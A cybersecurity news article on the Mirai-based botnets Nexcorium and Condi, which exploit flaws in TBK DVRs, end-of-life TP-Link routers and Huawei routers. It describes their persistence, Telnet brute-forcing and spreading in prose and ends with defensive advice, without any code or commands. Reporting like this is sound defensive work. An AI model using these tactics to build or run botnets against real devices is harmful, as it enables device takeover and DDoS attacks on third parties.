Mirai Botnet Variants Nexcorium and Condi Exploit TBK DVRs and EoL TP-Link Routers to Launch Large-Scale DDoS Attacks

Cybersecurity researchers have uncovered a sophisticated wave of attacks orchestrated by threat actors targeting critical vulnerabilities in Internet of Things (IoT) devices, specifically focusing on TBK digital video recorders (DVRs) and legacy TP-Link wireless routers. These campaigns, detailed in recent reports from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, involve the deployment of specialized Mirai-based botnet variants known as Nexcorium and Condi. By weaponizing both modern and years-old security flaws, attackers are rapidly expanding their infrastructure to facilitate massive Distributed Denial-of-Service (DDoS) attacks, highlighting a persistent and evolving threat to global network stability.

The exploitation of IoT infrastructure has become a cornerstone of cybercriminal operations due to the sheer volume of unsecured devices connected to the internet. According to Vincent Li, a security researcher at Fortinet, these devices are prime targets because they often lack consistent patching, utilize weak default credentials, and are frequently overlooked by standard enterprise security protocols. The latest findings underscore a trend where attackers no longer rely solely on new "zero-day" exploits but instead maximize the utility of known vulnerabilities in end-of-life (EoL) hardware that remains in active use across residential and small-business environments.

The Emergence of Nexcorium: Targeting TBK DVR Systems

One of the primary focal points of the current threat landscape is the exploitation of CVE-2024-3721, a command injection vulnerability with a CVSS score of 6.3. This medium-severity flaw affects TBK DVR-4104 and DVR-4216 devices, which are widely used for physical security surveillance. Threat actors leverage this vulnerability to gain initial access and deliver a downloader script. This script identifies the architecture of the host Linux system and fetches the appropriate binary for a new Mirai variant dubbed Nexcorium.

Upon successful execution, Nexcorium makes its presence known by displaying a defiant terminal message: "nexuscorp has taken control." The technical analysis of Nexcorium reveals a sophisticated architecture that mirrors the original Mirai source code but incorporates modern enhancements for evasion and persistence. The malware utilizes an XOR-encoded configuration table to hide its command-and-control (C2) server addresses and operational parameters from basic string analysis.

Furthermore, Nexcorium includes a dedicated watchdog module designed to ensure the malware remains running by monitoring system processes and restarting the bot if it is terminated. Its DDoS module is capable of launching diverse attack vectors, including UDP, TCP, and SMTP floods. To expand its reach, the malware also incorporates an exploit for CVE-2017-17215, a long-known vulnerability in Huawei HG532 devices. This allows the botnet to spread laterally across the network, turning a single compromised DVR into a gateway for infecting nearby networking hardware.

Persistence and Lateral Movement Strategies

The Nexcorium variant distinguishes itself through its aggressive persistence mechanisms. Once it gains a foothold, the malware attempts to establish a permanent presence using both crontab and systemd services. This ensures that even if the device is rebooted, the botnet payload will automatically re-execute. To evade forensic analysis and post-infection detection, the malware is programmed to delete its original downloaded binary immediately after establishing persistence in the system’s memory.

A significant component of Nexcorium’s strategy is its reliance on brute-force attacks. The malware contains an embedded list of hard-coded usernames and passwords commonly used as factory defaults for IoT devices. It scans the local network for open Telnet ports (typically port 23) and attempts to log in. If successful, it seeks to obtain a shell and repeat the infection process, effectively creating a self-propagating worm.

Fortinet researchers noted that the combination of vulnerability exploitation and extensive brute-force capabilities underscores the adaptability of modern botnets. By targeting devices like the TBK DVR, which are often connected to the internet 24/7 without robust firewalls, attackers can build a massive, always-on army of "zombie" devices ready to strike at a moment’s notice.

TP-Link Vulnerabilities and the Rise of the Condi Botnet

Parallel to the Nexcorium campaign, researchers at Palo Alto Networks Unit 42 have identified automated scanning and probing activities targeting a critical flaw in TP-Link wireless routers. This vulnerability, tracked as CVE-2023-33538, carries a high CVSS score of 8.8. It is a command injection flaw that allows authenticated attackers to execute arbitrary code on the device’s web interface.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recognized the severity of this issue by adding it to the Known Exploited Vulnerabilities (KEV) catalog in June 2025. Despite the availability of this information, many users continue to operate TP-Link models that have reached their end-of-life (EoL) status, meaning the manufacturer no longer provides security updates or technical support.

The malware being deployed in these attacks is a Mirai-like variant frequently referred to as "Condi." Unit 42’s analysis of the Condi source code revealed several unique features, including the ability for the malware to act as its own web server. This allows an infected router to serve the malware payload to other vulnerable devices that connect to it, facilitating a decentralized and rapid infection rate. Additionally, Condi includes a self-update mechanism, allowing the botnet operators to push new modules or C2 configurations to the infected fleet without needing to re-exploit the devices.

Interestingly, Unit 42 researchers Asher Davila, Malav Vyas, and Chris Navarrete observed that many of the current in-the-wild attacks targeting CVE-2023-33538 appear to be flawed. The automated scripts used by the attackers often fail to complete the exploitation chain correctly. However, the researchers cautioned that this "flawed approach" should not lead to complacency. The underlying vulnerability is real and easily exploitable by a more skilled actor, particularly because the flaw can be triggered if an attacker gains access to the router’s web interface—a task made easier by the prevalence of weak or default administrative credentials.

A Chronology of IoT Exploitation and Mirai Evolution

The current surge in botnet activity is the latest chapter in a history that began in 2016 with the original Mirai botnet, which famously took down major portions of the internet through attacks on DNS provider Dyn. When the Mirai source code was leaked online shortly after, it democratized DDoS capabilities, allowing various threat actor groups to create their own "flavors" of the malware.

• September 2023 – Early 2024: Attackers began pivoting toward newer IoT vulnerabilities in consumer-grade routers and DVRs, moving away from enterprise servers to exploit the lack of security in residential hardware.
• June 2025: CISA officially listed CVE-2023-33538 (TP-Link) in the KEV catalog, signaling that the flaw was being actively exploited in the wild.
• September 2025: CloudSEK disclosed a "Loader-as-a-Service" infrastructure. This cybercrime model allows low-skilled attackers to rent botnet infection capabilities to distribute payloads like RondoDox, Morte, and Mirai variants.
• Late 2025: Fortinet and Unit 42 release findings on Nexcorium and Condi, revealing that botnets are now integrating multiple exploits (ranging from 2017 to 2024) into a single payload to maximize infection success.

This timeline illustrates a shift in strategy. Rather than searching for one "master" exploit, botnet operators are now building modular toolkits that can probe for dozens of different vulnerabilities simultaneously. This "shotgun approach" ensures that even if one vulnerability is patched, the botnet can still find a foothold through another unpatched flaw on the same network.

The Economic and Strategic Impact of Botnets

The proliferation of Nexcorium and Condi is driven by a lucrative underground economy. Botnets are rarely used by their creators for a single purpose; instead, they are often "rented out" as DDoS-for-hire services (also known as "booter" or "stresser" services). These services allow malicious actors to target online gaming platforms, financial institutions, and government websites for a relatively low cost.

In January 2025, the cybersecurity community witnessed a record-breaking 56 Tbps DDoS attack, a testament to the staggering power that modern botnets can generate when hundreds of thousands of IoT devices are synchronized. Such attacks can cause significant financial damage, resulting in lost revenue for e-commerce sites, increased operational costs for service providers, and severe reputational damage.

Moreover, the use of botnets extends beyond mere disruption. State-sponsored actors and advanced persistent threat (APT) groups have been known to use compromised IoT networks as obfuscated proxies. By routing their malicious traffic through a legitimate residential router or a DVR, these actors can hide their true origin, making it difficult for defenders to attribute cyberattacks to specific nation-states or criminal organizations.

Risk Mitigation and Strategic Recommendations

The persistent exploitation of EoL devices like TP-Link routers and TBK DVRs presents a significant challenge for the cybersecurity community. Because these devices no longer receive security updates, the only truly effective mitigation is the physical replacement of the hardware. However, for many home users and small businesses, the "if it isn’t broken, don’t fix it" mentality often prevails, leaving them vulnerable to botnet recruitment.

To combat the threat of Nexcorium, Condi, and future Mirai variants, security experts recommend several key defensive measures:

1. Hardware Lifecycle Management: Organizations and individuals must audit their network hardware and identify devices that have reached EoL status. Replacing these with modern, supported hardware is critical.
2. Credential Hygiene: The use of default administrative credentials remains the single largest entry point for botnets. Changing default passwords to unique, complex strings is a fundamental requirement for IoT security.
3. Network Segmentation: Critical devices, such as DVRs and security cameras, should be placed on a separate VLAN (Virtual Local Area Network) with restricted access to the broader internet. This prevents a compromised IoT device from being used to move laterally into more sensitive parts of the network.
4. Disabling Unnecessary Services: Features like Telnet and UPnP (Universal Plug and Play) are frequently exploited by botnets. Disabling these services on routers and IoT devices significantly reduces the attack surface.
5. Monitoring and Threat Detection: Utilizing security solutions that can detect anomalous outbound traffic (such as massive spikes in UDP or TCP traffic) can help identify an infected device before it participates in a large-scale DDoS attack.

Conclusion: The Future of IoT Security

As the digital landscape expands with the rollout of 5G and the continued proliferation of smart devices, the "attack surface" available to botnet operators will only grow. The discovery of Nexcorium and Condi serves as a stark reminder that the vulnerabilities of the past continue to haunt the present. The cybersecurity industry must move toward a model of "security by design," where IoT manufacturers are held to higher standards regarding long-term support and the elimination of default credentials.

For the foreseeable future, the battle against botnets will be a game of cat and mouse. While researchers work to dismantle C2 infrastructures and identify new variants, threat actors will continue to refine their malware, seeking out the next unpatched router or forgotten DVR to add to their growing digital armies. The persistence of Nexcorium and Condi underscores a fundamental truth in modern cybersecurity: an unpatched device is not just a risk to its owner, but a potential weapon against the entire global internet infrastructure.